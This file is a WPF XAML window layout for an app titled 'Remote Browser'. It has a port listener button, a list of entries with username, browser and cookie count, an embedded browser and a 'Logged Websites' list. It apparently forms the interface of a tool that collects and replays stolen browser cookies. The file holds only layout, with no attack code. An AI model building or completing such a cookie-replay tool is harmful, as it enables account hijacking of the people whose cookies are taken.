RemoteBrowser/MainWindow.xaml

<Controls:MetroWindow x:Class="RemoteBrowserStub.MainWindow"
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:RemoteBrowserStub"
        mc:Ignorable="d"
        xmlns:Controls="clr-namespace:MahApps.Metro.Controls;assembly=MahApps.Metro"
        Title="Remote Browser" Height="670.133" Width="1666.617">
    <Grid>
        <WebBrowser x:Name="browser" HorizontalAlignment="Left" Height="600" Margin="364,41,0,-0.2" VerticalAlignment="Top" Width="980"/>
        <TextBox x:Name="textBox" HorizontalAlignment="Left" Height="23" Margin="10,10,0,0" TextWrapping="Wrap" Text="8080" VerticalAlignment="Top" Width="349"/>
        <Button x:Name="button_Copy" Content="Listen" HorizontalAlignment="Left" Margin="10,41,0,0" VerticalAlignment="Top" Width="348" Click="button_Copy_Click" RenderTransformOrigin="0.5,0.5">
            <Button.RenderTransform>
                <TransformGroup>
                    <ScaleTransform/>
                    <SkewTransform/>
                    <RotateTransform Angle="-0.266"/>
                    <TranslateTransform/>
                </TransformGroup>
            </Button.RenderTransform>
        </Button>
        <Button x:Name="button2" Content="Go" HorizontalAlignment="Left" Margin="1264,10,0,0" VerticalAlignment="Top" Width="75" Click="button2_Click" RenderTransformOrigin="1.595,0.469"/>
        <TextBox x:Name="textBox1" HorizontalAlignment="Left" Height="23" Margin="472,10,0,0" TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="787" KeyDown="textBox1_KeyDown"/>
        <Button x:Name="button_Copy1" Content="Back" HorizontalAlignment="Left" Margin="364,10,0,0" VerticalAlignment="Top" Width="103" Click="button_Copy1_Click"/>
        <ListView x:Name="listView" HorizontalAlignment="Left" Height="600" Margin="1344,41,0,-0.2" VerticalAlignment="Top" Width="316" MouseDoubleClick="listView_MouseDoubleClick">
            <ListView.View>
                <GridView>
                    <GridViewColumn Header="Domain" DisplayMemberBinding="{Binding Domain}"/>
                    <GridViewColumn Header="Count" DisplayMemberBinding="{Binding Count}"/>
                </GridView>
            </ListView.View>
        </ListView>
        <TextBlock x:Name="textBlock" HorizontalAlignment="Left" Margin="1344,9,0,0" TextWrapping="Wrap" TextAlignment="Center" Text="Logged Websites" FontSize="15" VerticalAlignment="Top" Height="26" Width="316"/>
        <ListView x:Name="listView_Copy" HorizontalAlignment="Left" Height="559" Margin="10,72,0,0" VerticalAlignment="Top" Width="349" MouseDoubleClick="listView_Copy_MouseDoubleClick">
            <ListView.View>
                <GridView>
                    <GridViewColumn Header="Date" DisplayMemberBinding="{Binding date}"/>
                    <GridViewColumn Header="Username" DisplayMemberBinding="{Binding username}"/>
                    <GridViewColumn Header="Browser" DisplayMemberBinding="{Binding browser}"/>
                    <GridViewColumn Header="Count" DisplayMemberBinding="{Binding cookieCount}"/>
                </GridView>
            </ListView.View>
        </ListView>

    </Grid>
</Controls:MetroWindow>
